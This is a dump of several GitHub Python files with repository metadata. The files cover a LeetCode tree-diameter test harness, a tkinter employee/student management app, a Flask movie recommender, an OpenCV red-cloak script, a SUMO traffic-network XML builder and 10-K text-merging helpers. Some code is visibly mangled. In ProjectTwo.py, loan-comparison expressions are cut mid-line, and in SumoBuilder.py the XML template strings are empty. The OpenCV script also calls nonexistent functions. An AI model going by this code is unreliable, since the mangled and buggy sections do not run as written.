output:', actual)\n 
print('Expected output:', expect)\n print('Passed?', actual == expect)\n print('\\n')\n\ndef listToTree(level_order: list) -> TreeNode:\n values = iter(level_order)\n root = TreeNode(next(values))\n nodes_to_fill = [root]\n try:\n while True:\n next_node = nodes_to_fill.pop(0)\n new_left = next(values)\n if new_left is not None:\n next_node.left = TreeNode(new_left)\n nodes_to_fill.append(next_node.left)\n new_right = next(values)\n if new_right is not None:\n next_node.right = TreeNode(new_right)\n nodes_to_fill.append(next_node.right)\n except StopIteration:\n return root\n\ntest0 = {'Input':\n {'root': listToTree([1,2,3,4,5])\n },\n 'Output': 3\n }\n\ntest1 = {'Input':\n {'root': listToTree([1,2])\n },\n 'Output': 1\n }\n\ntest2 = {'Input':\n {'root': listToTree([2, 3, None, 1])\n },\n 'Output': 2\n }\n\ntest3 = {'Input':\n {'root': listToTree([3,5,None,6,7,None,None,4,None,None,8])\n },\n 'Output': 4\n }\n\ntests = [test0, test1, test2, test3]\n\ndef main():\n solution = Solution()\n evaluate(solution.diameterOfBinaryTree, tests)\n\nif __name__ == '__main__':\n main()\n","repo_name":"zgwillustc/LeetCode","sub_path":"543-Diameter of Binary Tree/DiameterofBinaryTree.py","file_name":"DiameterofBinaryTree.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73747777121","text":"from functools import reduce\nimport tkinter.scrolledtext as ScrolledText\nfrom tkinter import *\nimport json\n\n# =============================================================================\n# Person Class\n# =============================================================================\nclass Person:\n def __init__(self,name,address):\n self._name =name\n self._address =address\n \n def get_name(self):\n return self._name\n \n def set_name(self , new_name):\n self._name = new_name\n \n def get_address(self):\n return self._address\n \n def set_address(self,new_address):\n self._address = new_address\n \n def __del__(self):\n print(\"I have been deleted\")\n\n# =============================================================================\n# Employee Class\n# =============================================================================\nclass Employee(Person):\n def __init__(self, employee_number, name, address, salary, job_title, loan):\n super().__init__(name, address)\n self.employee_number = int(employee_number)\n self.__salary = float(salary)\n self.__job_title = str(job_title)\n self.__loan = list(loan)\n \n def get_salary(self):\n return self.__salary\n \n def set_salary(self, changed_salary):\n self.__salary = changed_salary\n \n def get_job_title(self):\n return self.__job_title\n \n def set_job_title(self, changed_job_title):\n self.__job_title = changed_job_title\n \n def get_total_loans(self):\n if len(self.__loan) !=0: \n summation = reduce(lambda acc , loan : acc + loan , self.__loan)\n return summation\n \n def get_max_loan(self):\n if len(self.__loan) !=0: \n max_loan = reduce(lambda max_loan , current_loan : max_loan if max_loan > current_loan else current_loan ,self.__loan )\n return max_loan\n return 0\n \n \n def get_min_laon(self):\n if len(self.__loan) !=0: \n min_loan = reduce(lambda min_loan , current_loan : min_loan if min_loan < current_loan else current_loan ,self.__loan )\n return min_loan\n return 0\n \n def set_loans(self,changed_loans):\n self.__loan = changed_loans\n \n \n def get_loans(self):\n return self.__loan\n \n def print_info(self):\n print(\"Employee Information :-\\n\" + 
\"Name : \" + self._name, \"\\nAddress : \" + self._address, \"\\nEmployee Number : \"+str(self.employee_number), \"\\nSalary : \"+ str(self.__salary), \"\\nJop Title : \" +self.__job_title,\"\\nTotal Loans : \" +str(self.get_total_loans()) , end=\"\\n\")\n \n \n def __del__(self):\n print('I have been deleted')\n\n# =============================================================================\n# Student Class\n# =============================================================================\nclass Student(Person): \n def __init__(self, student_number,name,address, subject, marks):\n super().__init__(name,address)\n self.student_number = int(student_number)\n self.__subject = str(subject)\n self.__marks = dict(marks)\n \n def get_subject(self):\n return self.__subject\n \n def set_subject(self, changed_subject):\n self.__subject = changed_subject\n \n def get_marks(self):\n return self.__marks\n \n def set_marks(self, change_marks):\n self.__marks = change_marks\n \n def get_average(self):\n avg = reduce(lambda acc, mark: acc + mark,self.__marks.values()) / len(self.__marks)\n return avg\n \n def get_list_grade_marks(self):\n list_grades = {}\n for key,value in self.__marks.items():\n if value >= 90:\n list_grades.update({key:value})\n return list_grades\n \n def print_info(self):\n print(\"Student Information :-\", \"\\nStudent Number : \", self.student_number, \"\\nName : \", self._name, \"\\nAddress : \", self._address, \"\\nSubject : \", self.__subject, \"\\nAverage\", self.get_average(), \"\\nMarks : \", str(self.__marks));\n \n def __del__(self):\n print(\"I have been deleted\")\n \n# =============================================================================\n# Extr Methods\n# =============================================================================\ndef total_objects_method(objects_list , message):\n print(message , len(objects_list))\n \ndef maximium_loan(objects_list):\n return reduce(lambda acc , employee : employee if employee.get_max_loan() > acc.get_max_loan() else acc,objects_list)\n \ndef minimum_loan(objects_list):\n return reduce(lambda acc ,loan : acc if acc.get_min_laon()==0 or loan.get_min_laon()==0 else loan if loan.get_min_laon()nested_loan else nested_loan,loan)\n if(acc >nested_reduce):\n return acc\n else:\n return nested_reduce\n \n \n \n highest_loan = reduce(reduce_employee, employee_list.values(),0)\n return highest_loan;\n \n\ndef lowerst_loans_by_dictionary(employee_list):\n \n def reduce_employee(acc , loan):\n nested_reduce =reduce(lambda nested_acc , nested_loan:nested_acc if nested_accmax_salary:\n max_salary = employee.get_salary()\n return max_salary\n\ndef lowest_salary(employee_list):\n min_salary = 1000000000000000;\n for employee in employee_list:\n if employee.get_salary() acc.get_average() else acc, students_list) \nprint(\"------------------------------------------\")\nprint(\"The Student INFO That have highst AVG :\")\nhighst_average.print_info()\n\n\n#=================================== 17 ====================================#\nprint(\"-------------------------17------------------------\")\nremove_objects(employee_list)\nremove_objects(students_list)\n\n\n\n\nroot = Tk()\nroot.title('Desktop App')\nroot.geometry('500x300+710+390')\n\ndef messageBox():\n messagebox.showinfo('HELP','OOP Second Project' )\n \n\ndef employee():\n def subAddEmp():\n Loans = [int(i) for i in lon.get().split(\",\")]\n tempEmp = Employee( int(num.get()) ,names.get(),addr.get(),float(saly.get()),job.get(), Loans)\n employee_list.append(tempEmp)\n 
print(len(employee_list))\n\n c = Toplevel(root)\n c.geometry(\"300x250+810+415\")\n number = Label(c, text=\"Employee Number\").place(x=10, y=10)\n name = Label(c, text=\"Employee Name\").place(x=10, y=40)\n address = Label(c, text=\"Address\").place(x=10, y=70)\n salary = Label(c, text=\"Salary\").place(x=10, y=100)\n jobTitle = Label(c, text=\"Job Title\").place(x=10, y=130)\n loan = Label(c, text=\"Loan\").place(x=10, y=160)\n add = Button(c,text=\"Add\",command=subAddEmp).place(x=10, y=190)\n\n num = StringVar()\n employee_number= Entry(c, textvariable = num).place(x = 120, y= 10)\n names = StringVar()\n name = Entry(c, textvariable = names).place(x = 120, y= 40)\n addr = StringVar()\n address= Entry(c, textvariable = addr).place(x = 120, y= 70)\n saly = StringVar()\n salary = Entry(c, textvariable = saly).place(x = 120, y= 100)\n job = StringVar()\n job_title= Entry(c, textvariable = job).place(x = 120, y= 130)\n lon = StringVar()\n loan = Entry(c, textvariable = lon).place(x = 120, y= 160)\n exitform = Button(c,text=\"Exit\",command=c.destroy).place(x=120, y=190)\n\n\ndef student():\n def subAddStu():\n print(len (students_list))\n allMarks =json.loads(mark.get())\n tempStu = Student(int(num.get()), names.get(), addr.get(), sub.get(), allMarks)\n students_list.append(tempStu)\n print(len(students_list))\n\n\n c = Toplevel(root)\n c.geometry(\"300x250+810+415\")\n number = Label(c, text=\"Student Number\").place(x=10, y=10)\n name = Label(c, text=\"Student Name\").place(x=10, y=40)\n address = Label(c, text=\"Address\").place(x=10, y=70)\n subject = Label(c, text=\"Subject\").place(x=10, y=100)\n marks = Label(c, text=\"Marks\").place(x=10, y=130)\n add = Button(c,text=\"Add\",command=subAddStu).place(x=10, y=160)\n\n num = StringVar() \n student_number= Entry(c, textvariable = num).place(x = 120, y= 10)\n names = StringVar()\n name = Entry(c,textvariable = names).place(x = 120, y= 40)\n addr = StringVar()\n address= Entry(c, textvariable = addr).place(x = 120, y= 70)\n sub = StringVar()\n subject = Entry(c, textvariable = sub).place(x = 120, y= 100)\n mark = StringVar()\n marks= Entry(c, textvariable = mark).place(x = 120, y= 130)\n exitform = Button(c,text=\"Exit\",command=c.destroy).place(x=120, y=160) \n\n\ndef viewStudent():\n viewchild = Toplevel(root)\n st = ScrolledText.ScrolledText(viewchild)\n st.pack()\n \n\n for i,v in enumerate(students_list):\n st.insert(INSERT, \"Student \"+str(i+1)+\"\\n\" +\"Student Number \"+ str(v.student_number) +\" Name : \"+v.get_name()+\" \"+\" Address \"+v.get_address()+\" AVG \"+str(v.get_average()) +\"\\n\")\n st.insert(INSERT, \"Marks : \\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n for key,value in v.get_list_grade_marks().items():\n st.insert(INSERT, str(key)+\" \" + str(value)+\"\\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n\n\n \ndef viewEmployee():\n viewchild = Toplevel(root)\n st = ScrolledText.ScrolledText(viewchild)\n st.pack()\n \n\n for i,v in enumerate(employee_list):\n st.insert(INSERT, \" Employee \"+str(i+1)+\"\\n\" +\" Employee Number \"+ str(v.employee_number) +\" Name : \"+v.get_name()+\" \"+\" Address \"+v.get_address() + \" Job Title \"+v.get_job_title() + \" Salary \"+str(v.get_salary()) +\" Totla Loans \" +str(v.get_total_loans())+ \" Max Loan \"+str(v.get_max_loan()) + \" Min Loan \"+str(v.get_min_laon()) +\"\\n\")\n st.insert(INSERT, \"All Loans : \\n\")\n 
st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n for value in v.get_loans():\n st.insert(INSERT,str(value)+\"\\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\") \n\ndef viewdeletewindowEmployee():\n def delete():\n notfind=True\n for i,v in enumerate(employee_list):\n if(v.employee_number == int(user_number.get())):\n employee_list.pop(i)\n notfind=False\n \n if notfind:\n messagebox.showerror(\"Error\",\"Can't Find The Student\")\n \n viewchild = Toplevel(root)\n viewchild.geometry(\"200x150+800+415\")\n user_number=StringVar()\n entryID = Entry(viewchild,textvariable=user_number).place(x=20,y=20)\n btn=Button(viewchild, text=\"Delete\",command=delete).place(x=20,y=40)\n \n\n\ndef viewdeletewindowStudents():\n def delete():\n notfind=True\n for i,v in enumerate(students_list):\n if(v.student_number == int(user_number.get())):\n students_list.pop(i)\n notfind=False\n \n if notfind:\n messagebox.showerror(\"Error\",\"Can't Find The Student\")\n \n viewchild = Toplevel(root)\n viewchild.geometry(\"200x150+800+415\")\n user_number=StringVar()\n entryID = Entry(viewchild,textvariable=user_number).place(x=20,y=20)\n btn=Button(viewchild, text=\"Delete\",command=delete).place(x=20,y=40)\n \n \n\n\n \ndef report():\n viewchild = Toplevel(root)\n st = ScrolledText.ScrolledText(viewchild)\n st.pack()\n \n\n for i,v in enumerate(employee_list):\n st.insert(INSERT, \" Employee \"+str(i+1)+\"\\n\" +\" Employee Number \"+ str(v.employee_number) +\" Name : \"+v.get_name()+\" \"+\" Address \"+v.get_address() + \" Job Title \"+v.get_job_title() + \" Salary \"+str(v.get_salary()) +\" Totla Loans \" +str(v.get_total_loans())+ \" Max Loan \"+str(v.get_max_loan()) + \" Min Loan \"+str(v.get_min_laon()) +\"\\n\")\n st.insert(INSERT, \"All Loans : \\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n for value in v.get_loans():\n st.insert(INSERT,str(value)+\"\\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\") \n\n for i,v in enumerate(students_list):\n st.insert(INSERT, \"Student \"+str(i+1)+\"\\n\" +\"Student Number \"+ str(v.student_number) +\" Name : \"+v.get_name()+\" \"+\" Address \"+v.get_address()+\" AVG \"+str(v.get_average()) +\"\\n\")\n st.insert(INSERT, \"Marks : \\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n for key,value in v.get_list_grade_marks().items():\n st.insert(INSERT, str(key)+\" \" + str(value)+\"\\n\")\n st.insert(INSERT,\"------------------------------------------------------------------\\n\")\n\n \n \ntop = Menu(root)\nroot.config(menu=top)\n\nfile = Menu(top, tearoff = 0)\nfile.add_command(label='Rport', command = report)\nfile.add_separator()\nfile.add_command(label='Exit', command = root.destroy)\ntop.add_cascade(label='File', menu=file)\n\nemployees = Menu(top, tearoff=0)\nemployees.add_command(label='Add', command=employee)\nemployees.add_command(label='View', command = viewEmployee)\nemployees.add_command(label='Delete', command = viewdeletewindowEmployee)\ntop.add_cascade(label = 'Employees', menu=employees)\n\n\nstudents = Menu(top, tearoff=0)\nstudents.add_command(label='Add', command=student)\nstudents.add_command(label='View', command = viewStudent)\nstudents.add_command(label='Delete', command = viewdeletewindowStudents)\ntop.add_cascade(label = 'Students', menu=students)\n\n\n_help = Menu(top, 
tearoff=0)\n_help.add_command(label='About', command = messageBox)\ntop.add_cascade(label = 'Help', menu=_help)\n\n\nroot.mainloop()\n\n\n\n# =============================================================================\n\n\n\n\n\n\n\n\n\n\n\n\n# =============================================================================\n \n \n\n\n \n \n\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n","repo_name":"Bittar-95/Python","sub_path":"ProjectTwo.py","file_name":"ProjectTwo.py","file_ext":"py","file_size_in_byte":21163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73374402723","text":"from flask import Flask, render_template, request\nimport pandas as pd\nfrom modules import *\nfrom surprise import dump\n\n# Load the trained SVD model from the file\nloaded_model = dump.load('models/svd_model.pkl')\n\n# Access the loaded model\nsvd_model = loaded_model[1]\n\nmovielens=pd.read_csv('datasets/movielens.csv')\ntop30=pd.read_csv('datasets/top.csv')\ntop30 = top30.values.tolist()\nprint(top30[0])\nusers = movielens['user_id'].unique()\n\n#flask config\napp = Flask(__name__)\n\n@app.route('/', methods=['GET'])\ndef index():\n # Handle GET request\n return render_template('index.html',top=top30)\n@app.route('/genre', methods=['GET','POST'])\ndef genre():\n # Handle GET request\n if request.method=='POST':\n movie_name = request.form[\"movie\"]\n image,overview,genre=get_movie_genre(movie_name)\n return render_template('genreResult.html',movie_name=movie_name,overview=overview,genre=genre,image=image)\n return render_template('genre.html')\n\n@app.route('/sentiment', methods=['GET','POST'])\ndef sentiment():\n # Handle GET request\n if request.method=='POST':\n movie_name = request.form[\"movie\"]\n #return render_template('sentimentResult.html',movie_name=movie_name)\n image,reviews,score=getSentiment(movie_name)\n return render_template('sentimentResult.html',image=image,movie_name=movie_name,reviews=reviews,score=score)\n return render_template('sentiment.html')\n\n@app.route('/precommender',methods=['GET','POST'])\ndef precommender():\n if request.method=='POST':\n user=request.form[\"user\"]\n precommendations=get_recommendations(data=movielens,user_id=user,top_n=10,algo=svd_model)\n posters=[]\n for m in precommendations:\n im=get_image(m[0])\n posters.append(im)\n return render_template('precommenderResults.html',posters=posters,user_id=user,topFive=precommendations)\n return render_template('precommender.html',users=users)\n\n@app.route('/grecommender',methods=['GET','POST'])\ndef grecommender():\n if request.method=='POST':\n user1=request.form[\"user1\"]\n user2=request.form[\"user2\"]\n user3=request.form[\"user3\"]\n grecommendations=grouprecommendations(user1,user2,user3)\n postersg=[]\n for m in grecommendations:\n im=get_image(m)\n postersg.append(im)\n return render_template('grecommenderResults.html',posters=postersg,user1=user1,user2=user2,user3=user3,topTen=grecommendations)\n return render_template('grecommender.html',users=users)\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"Reckon77/group-movie-recommender","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40299262552","text":"import cv2\r\nimport numpy as np\r\nimport time\r\n\r\n#to save the output in avi format\r\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\r\noutput_file = cv2.VideoWriter('output.avi', 
fourcc, 20.0,(640,48))\r\n#to start the camera\r\ncam = cv2.VideoCapture(0)\r\n#to start the program after two seconds\r\ntime.sleep(2)\r\nbg = 0\r\n#to capture the background for 60 frames\r\nfor i in range(60):\r\n #to return the read images inside the bg var\r\n ret, bg = cam.read()\r\n#to flip the bg img\r\nbg = np.flip(bg,axis = 1)\r\n\r\n#to read the captured images until the camera is open\r\nwhile(cam.isOpened()):\r\n ret, img = cam.read()\r\n if not ret:\r\n break\r\n img = np.flip(img,axis = 1)\r\n #to convert the color of the img from bgr to hsv\r\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n #to generate a mask to detect red color\r\n lower_red = np.array([0,120,50])\r\n upper_red = np.array([10,255,255])\r\n mask_one = cv2.inRange(hsv,lower_red,upper_red)\r\n \r\n lower_red = np.array([170,120,70])\r\n upper_red = np.array([180,255,255])\r\n mask_two = cv2.inRange(hsv,lower_red,upper_red)\r\n \r\n mask_one=mask_one+mask_two\r\n #to open and expand the img where there is mask_one color\r\n mask_one = cv2.morphologyEx(mask_one, cv2.MORPH_OPEN, np.ones(3,3), np.uint8)\r\n mask_one = cv2.morphologyEx(mask_one, cv2.MORPH_DILATE, np.ones(3,3), np.uint8)\r\n \r\n #to select the part tat doesnot have mask one\r\n mask_two = cv2.bitwise_not(mask_one)\r\n \r\n #to save the part of the img without using red color\r\n res_one = cv2.bitwise_and(img,img,mask=mask_two)\r\n res_two = cv2.bitwise_and(bg,bg,mask=mask_two)\r\n #to generate the final output\r\n final_output = cv2.addWaited(res_one, 1, res_two, 1,0)\r\n \r\ncam.release()\r\n#out.release()\r\ncv2.destroyAllWindows()","repo_name":"PrabhudevMishra/C121","sub_path":"c121.py","file_name":"c121.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23400548049","text":"import os, sys\nimport logging\n\n# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n# XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\nclass SumoBuilder :\n\n # -----------------------------------------------------------------\n def __init__(self, settings, world, laysettings) :\n self.Logger = logging.getLogger(__name__)\n\n self.World = world\n self.LayoutSettings = laysettings\n\n self.ScaleValue = 3.0\n\n try :\n self.Path = settings[\"SumoConnector\"].get(\"SumoNetworkPath\",\".\")\n self.Prefix = settings[\"SumoConnector\"].get(\"SumoDataFilePrefix\",\"network\")\n self.ScaleValue = settings[\"SumoConnector\"].get(\"NetworkScaleFactor\",3.0)\n self.VehicleScaleValue = settings[\"SumoConnector\"].get(\"VehicleScaleFactor\",2.0)\n except NameError as detail:\n self.Logger.warn(\"Failed processing sumo configuration; name error %s\", (str(detail)))\n sys.exit(-1)\n except KeyError as detail:\n self.Logger.warn(\"unable to locate sumo configuration value for %s\", (str(detail)))\n sys.exit(-1)\n except :\n self.Logger.warn(\"SumoBuilder configuration failed; %s\", (sys.exc_info()[0]))\n sys.exit(-1)\n\n # -----------------------------------------------------------------\n def Scale(self, value) :\n return self.ScaleValue * value\n\n # -----------------------------------------------------------------\n def VehicleScale(self, value) :\n return self.VehicleScaleValue * value\n\n # -----------------------------------------------------------------\n def CreateRoads(self) :\n fname = os.path.join(self.Path,self.Prefix + '.edg.xml')\n\n with open(fname, 'w') as fp :\n fp.write(\"\\n\")\n\n for ename, edge in self.World.IterEdges(edgetype 
= 'Road') :\n sn = edge.StartNode.Name\n en = edge.EndNode.Name\n etype = edge.RoadType.Name\n cn = 'center' if edge.RoadType.Center else 'right'\n fp.write(\" \\n\" % (ename, cn, sn, en, etype))\n\n fp.write(\"\\n\")\n\n # -----------------------------------------------------------------\n def CreateIntersections(self) :\n fname = os.path.join(self.Path,self.Prefix + '.nod.xml')\n\n with open(fname, 'w') as fp :\n fp.write(\"\\n\")\n\n for name, node in self.World.IterNodes(nodetype = 'Intersection') :\n itype = node.IntersectionType.IntersectionType\n fp.write(\" \\n\" % (name, self.Scale(node.Coord.X), self.Scale(node.Coord.Y), itype))\n\n for name, node in self.World.IterNodes(nodetype = 'EndPoint') :\n itype = node.IntersectionType.IntersectionType\n fp.write(\" \\n\" % (name, self.Scale(node.Coord.X), self.Scale(node.Coord.Y), itype))\n\n fp.write(\"\\n\")\n\n # -----------------------------------------------------------------\n def CreateConnections(self) :\n fname = os.path.join(self.Path,self.Prefix + '.con.xml')\n\n fstring = \" \\n\"\n with open(fname, 'w') as fp :\n fp.write(\"\\n\")\n\n for name, node in self.World.IterNodes(nodetype = 'Intersection') :\n\n if not node.EdgeMap.Signature() == ['2L/2L', '2L/2L', '2L/2L', '2L/2L' ] :\n continue\n\n oedges = node.EdgeMap.OutputEdgeMap()\n iedges = node.EdgeMap.InputEdgeMap()\n for pos in range(4) :\n lpos = (pos + 1) % 4 # left turn\n spos = (pos + 2) % 4 # straight across\n rpos = (pos + 3) % 4 # right turn\n\n fp.write(fstring.format(iedges[pos].Name, oedges[lpos].Name, 1, 1))\n fp.write(fstring.format(iedges[pos].Name, oedges[spos].Name, 1, 1))\n fp.write(fstring.format(iedges[pos].Name, oedges[spos].Name, 0, 0))\n fp.write(fstring.format(iedges[pos].Name, oedges[rpos].Name, 0, 0))\n\n fp.write(\"\\n\")\n\n # -----------------------------------------------------------------\n def CreateRoadTypes(self) :\n fname = os.path.join(self.Path,self.Prefix + '.typ.xml')\n\n with open(fname, 'w') as fp :\n fp.write(\"\\n\")\n\n for name, rtype in self.World.IterNodes(nodetype = 'RoadType') :\n etype = rtype.RoadType\n fp.write(\" \\n\" %\n (etype.Name, etype.Priority, etype.Lanes, self.Scale(etype.Speed), self.VehicleScale(etype.Width)))\n\n fp.write(\"\\n\")\n\n # -----------------------------------------------------------------\n def CreateRoutes(self) :\n vtfmt = ' '\n\n fname = os.path.join(self.Path,self.Prefix + '.rou.xml')\n\n with open(fname, 'w') as fp :\n fp.write(\"\\n\")\n\n for v in self.LayoutSettings.VehicleTypes :\n vtype = self.LayoutSettings.VehicleTypes[v]\n fp.write(vtfmt.format(v, self.Scale(vtype.Acceleration), self.Scale(vtype.Deceleration),\n vtype.Sigma, self.VehicleScale(vtype.Length), self.VehicleScale(vtype.MinGap), self.Scale(vtype.MaxSpeed)) + \"\\n\")\n\n fp.write(\"\\n\")\n\n for name, node in self.World.IterNodes(nodetype = 'EndPoint') :\n name = None\n for edge in node.OutputEdges :\n for redge in edge.EndNode.OutputEdges :\n if redge.EndNode == node :\n name = node.EndPoint.DestinationName\n edges = edge.Name + \" \" + redge.Name\n fp.write(\" \\n\" % (name, edges))\n break\n\n if not name :\n self.Logger.warn('cannot find route for %s', node.Name)\n\n fp.write(\"\\n\")\n\n # -----------------------------------------------------------------\n def PushNetworkToSumo(self) :\n self.CreateIntersections()\n self.CreateRoads()\n self.CreateRoadTypes()\n self.CreateRoutes()\n 
self.CreateConnections()\n","repo_name":"Mondego/spacetime-apps","sub_path":"python/applications/mobdat/builder/SumoBuilder.py","file_name":"SumoBuilder.py","file_ext":"py","file_size_in_byte":6715,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"36282156560","text":"from engine.main import Engine\nimport json\n\nengine = Engine()\n\nf_app = open('SecureWebContainer.json')\napplication = json.load(f_app)\n\nf_offers = open('offers_20.json')\noffers = json.load(f_offers)\n\nengine.solve(application, offers)\n","repo_name":"edilaitin/dissertation-aidc","sub_path":"engine/tests/testWrapper.py","file_name":"testWrapper.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16311483578","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 18 14:14:42 2022\n\n@author: leon\n\"\"\"\n\nimport os\nimport re\nimport pandas as pd\nimport numpy as np\n\ndef load_ticker(load_path, file_name):\n \"\"\"\n Load ticker text file ticker.txt, return list of tickers.\n\n Parameters\n ----------\n load_path : str\n data path to load ticker text file\n\n Returns\n -------\n list\n\n \"\"\"\n read_full_path = os.path.join(load_path, file_name)\n with open(read_full_path, 'r') as f:\n lines = f.read()\n contents_split = lines.splitlines()\n \n return contents_split\n\ndef load_text(load_full_path):\n \"\"\"\n Load txt file from the given load_path\n\n Parameters\n ----------\n load_full_path : \n the full path to load the corresponding text file.\n Returns\n -------\n str\n\n \"\"\"\n text_file = open(load_full_path, \"r\")\n data = text_file.read()\n text_file.close()\n return data\n\ndef find_rf(ticker, rf_map, load_path = \"../text_data/10K_riskfactor\"):\n \"\"\"\n Find the risk factor files corresponding to the ticker. Return a dictionary\n containing the ticker, year and risk factor texts.\n\n Parameters\n ----------\n ticker : str\n a symbol representing a stock\n rf_map : pandas dataframe\n a dataframe with mapping between ticker, date, and risk factor file name.\n load_path: str\n the path to load risk factor related txt file.\n Returns\n -------\n dataframe\n\n \"\"\"\n time_ls = []\n rf_ls = []\n tk_ls = [ticker]\n \n cur_rf_map = rf_map[rf_map['firm'] == ticker]\n for i in range(len(cur_rf_map)):\n cur_file = cur_rf_map['filename'].iloc[i]\n cur_date = int(cur_rf_map['time'].iloc[i])\n load_full_path = os.path.join(load_path, cur_file)\n if os.path.isfile(load_full_path):\n cur_txt = load_text(load_full_path)\n rf_ls.append(cur_txt)\n time_ls.append(cur_date)\n else:\n print(\"There is no corresponding file. Continue.\")\n ls_len = len(time_ls)\n tk_ls = tk_ls * ls_len\n out_dict = {\"ticker\": tk_ls, \"time\": time_ls, \"risk_factor\": rf_ls}\n out_df = pd.DataFrame(out_dict)\n return out_df\n\ndef find_item1_7(ticker, item1_7_map, input_item, load_path):\n \"\"\"\n Find the item1 files corresponding to the ticker. Return a dictionary\n containing the ticker, year and item 1 or 7 texts.\n\n Parameters\n ----------\n ticker : str\n a symbol representing a stock\n item1_7_map : pandas dataframe\n a dataframe with mapping between ticker, date, and item1 and item7 file name\n input_item: str, \"1\" or \"7\"\n \"1\" represent we want item 1. 
\"7\" represent we want item 7.\n load_path : str\n the path to load item 1 related txt file.\n\n Returns\n -------\n dataframe\n\n \"\"\"\n time_ls = []\n item_ls = []\n tk_ls = [ticker]\n report_date_ls = []\n \n cur_item_map = item1_7_map[item1_7_map['firm'] == ticker]\n for i in range(len(cur_item_map)):\n if input_item == \"1\":\n cur_file = cur_item_map['filename'].iloc[i].split(\".\")[0] + \"_item1.txt\"\n elif input_item == \"7\":\n cur_file = cur_item_map['filename'].iloc[i].split(\".\")[0] + \"_item7.txt\"\n cur_date = cur_item_map['time'].iloc[i]\n cur_report_date = cur_item_map['report_date'].iloc[i]\n load_full_path = os.path.join(load_path, cur_file)\n if os.path.isfile(load_full_path):\n cur_txt = load_text(load_full_path)\n item_ls.append(cur_txt)\n time_ls.append(cur_date)\n report_date_ls.append(cur_report_date)\n \n else:\n print(f\"There is no corresponding file {cur_file}. Continue.\")\n ls_len = len(time_ls)\n tk_ls = tk_ls * ls_len\n if input_item == \"1\":\n out_dict = {\"ticker\": tk_ls, \"time\": time_ls, \"item1\": item_ls, \"10K_report_date\": report_date_ls}\n elif input_item == \"7\":\n out_dict = {\"ticker\": tk_ls, \"time\": time_ls, \"item7\": item_ls}\n out_df = pd.DataFrame(out_dict)\n return out_df \n\n\n \ndef merge_text(rf_df, item1_df, item7_df):\n \"\"\"\n input ticker, csv of risk factor, dictionary of item1,\n and dictionary of item7. Return a pandas dataframe containing\n date, ticker, risk factor text, MD&A text, business text\n\n Parameters\n ----------\n rf_df : dataframe\n dataframe of risk factor containing ticker, time, and risk_factor\n item1_df : dataframe\n dataframe of item1 containing ticker, time and item1.\n item7_df : dataframe\n dataframe of item7 containing ticker, time and item7.\n\n Returns\n -------\n pandas dataframe.\n\n \"\"\"\n \n temp_df1 = rf_df.merge(item1_df, on = 'time', how = 'inner')\n temp_df2 = temp_df1.merge(item7_df, on = 'time', how = 'inner')\n final_df = temp_df2.drop(['ticker_x', 'ticker_y'], axis = 1)\n return final_df\n\n\ndef call_merge(ticker_ls, rf_map, item1_7_map, rf_load_path,\n item1_load_path, item7_load_path, save_path,\n save_path2 = None):\n \"\"\"\n merge risk factor, item1, and item7 texts for all tickers in the\n ticker_ls. Save it to the save_path. We shall save a helper file\n in save_path2.\n\n Parameters\n ----------\n ticker_ls : TYPE\n DESCRIPTION.\n rf_map : TYPE\n DESCRIPTION.\n item1_7_map : TYPE\n DESCRIPTION.\n rf_load_path : TYPE\n DESCRIPTION.\n item1_load_path : TYPE\n DESCRIPTION.\n item7_load_path : TYPE\n DESCRIPTION.\n save_path : TYPE\n DESCRIPTION.\n save_path2 : TYPE, optional\n DESCRIPTION. 
The default is None.\n\n Returns\n -------\n None.\n\n \"\"\"\n out_dict = {}\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n \n # If the save_path contains files, clearing them first.\n if len(os.listdir(save_path)) != 0:\n for f in os.listdir(save_path):\n os.remove(os.path.join(save_path, f))\n \n for i, tic in enumerate(ticker_ls):\n rf_df = find_rf(tic, rf_map)\n item1_df = find_item1_7(tic, item1_7_map, \"1\", item1_load_path)\n item7_df = find_item1_7(tic, item1_7_map, \"7\", item7_load_path)\n new_df = merge_text(rf_df, item1_df, item7_df)\n cur_len = len(new_df)\n \n # if the resulting file doesn't have item, skip\n if cur_len == 0:\n continue\n out_dict[tic] = cur_len\n save_file_name = tic + \"_text.csv\"\n save_full_path = os.path.join(save_path, save_file_name)\n new_df.to_csv(save_full_path, index = False)\n \n if save_path2:\n if not os.path.exists(save_path2):\n os.makedirs(save_path2)\n len_df = pd.DataFrame.from_dict(out_dict, orient = 'index')\n save_full_path2 = os.path.join(save_path2, \"ticker_num_years.csv\")\n len_df.to_csv(save_full_path2, index = False)\n \nif __name__ == \"__main__\":\n \n text_file = open(\"../text_data/10K_riskfactor/zyxi-0001144204-19-010229.txt\", 'r')\n data = text_file.read()\n text_file.close()\n print(data)\n \n \n # Create concise risk factor mapping\n rf = 